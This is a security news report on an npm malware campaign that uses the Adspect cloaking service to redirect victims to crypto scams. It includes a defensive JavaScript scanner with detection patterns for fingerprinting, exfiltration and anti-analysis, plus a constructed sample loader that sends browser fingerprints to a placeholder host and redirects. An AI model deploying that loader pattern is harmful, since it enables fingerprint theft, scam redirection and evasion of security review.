https://socket.dev/blog/npm-malware-campaign-uses-adspect-cloaking-to-deliver-malicious-redirects

Researchers have uncovered a set of malicious npm packages that abuse the cloud-based Adspect cloaking service to bypass security checks and steer unsuspecting victims to cryptocurrency scam sites.

The investigation by security firm Socket has identified seven packages published under the developer name ‘dino_reborn’, six of which contain malicious code designed to collect visitor data and determine whether the traffic is from a researcher or a potential victim.

The attack works by gathering details about the user’s browser environment, such as user agent, referrer, URI, and language, and sending this fingerprint data to the Adspect API. Adspect evaluates the information and classifies the visitor, redirecting potential victims to a fake cryptocurrency-branded CAPTCHA page that triggers a deceptive sequence leading to the scam site.

Meanwhile, visitors flagged as potential researchers are shown a benign Offlido company page to reduce suspicion. This sophisticated cloaking mechanism, which also includes anti-analysis techniques like blocking right-click and developer tools, makes it significantly more challenging for security researchers to investigate and mitigate the threat.
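The behaviour described above (fingerprint collection, a call-out to a classification API, a verdict-dependent redirect, and right-click/devtools blocking) leaves recognisable traces in package source. The following is an added example of a heuristic static check for that combination; it is not Socket's scanner, and the indicator patterns and both sample files are constructed for illustration (the API hostname is a placeholder, not the real Adspect endpoint).

```javascript
// Heuristic scan of an npm package's JavaScript for the cloaking pattern.
// Indicator regexes are assumptions, not a complete signature set.
const INDICATORS = {
  fingerprint: [/navigator\.userAgent/, /document\.referrer/,
                /navigator\.language/, /location\.(?:href|pathname)/],
  exfil:       [/\bfetch\s*\(\s*['"]https?:\/\//, /new\s+XMLHttpRequest\s*\(/,
                /navigator\.sendBeacon\s*\(/],
  antiAnalysis:[/addEventListener\s*\(\s*['"]contextmenu['"]/, /oncontextmenu\s*=/,
                /keyCode\s*===?\s*123/, /\bdebugger\b/],          // F12 = 123
  redirect:    [/location(?:\.href)?\s*=[^=]/, /location\.replace\s*\(/],
};

// Returns per-category hit counts plus two verdicts. Cloaking is only
// suspected when all three legs co-occur: collect, phone home, branch.
function scanSource(src) {
  const hits = {};
  for (const [category, patterns] of Object.entries(INDICATORS)) {
    hits[category] = patterns.filter((re) => re.test(src)).length;
  }
  const cloakingSuspected =
    hits.fingerprint >= 2 && hits.exfil >= 1 && hits.redirect >= 1;
  return { hits, cloakingSuspected, antiAnalysis: hits.antiAnalysis >= 1 };
}

// Constructed sample mimicking the loader shape described in the report.
const SAMPLE_SUSPICIOUS = [
  "const fp = {",
  "  ua: navigator.userAgent,",
  "  ref: document.referrer,",
  "  uri: location.href,",
  "  lang: navigator.language,",
  "};",
  "document.addEventListener('contextmenu', (e) => e.preventDefault());",
  "document.addEventListener('keydown', (e) => { if (e.keyCode === 123) e.preventDefault(); });",
  "fetch('https://api.example.invalid/check', { method: 'POST', body: JSON.stringify(fp) })",
  "  .then((r) => r.json())",
  "  .then((v) => { if (v.ok) location.href = v.target; });",
].join('\n');

// Constructed benign sample: one fingerprint-like read, nothing else.
const SAMPLE_BENIGN = [
  "export function greet(name) {",
  "  return 'Hello, ' + name + ' (' + navigator.language + ')';",
  "}",
].join('\n');

console.log(scanSource(SAMPLE_SUSPICIOUS));  // cloakingSuspected: true
console.log(scanSource(SAMPLE_BENIGN));      // cloakingSuspected: false
```

Treat a positive result as a triage signal for manual review rather than proof of malice, since legitimate analytics code can trip individual indicators.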

Adspect has stated that it does not target researchers directly and that abuse of its service violates its terms of use. Even so, the incident highlights the need for increased vigilance and collaboration within the cybersecurity community, as malicious actors continue to exploit legitimate services to evade detection and compromise unsuspecting users.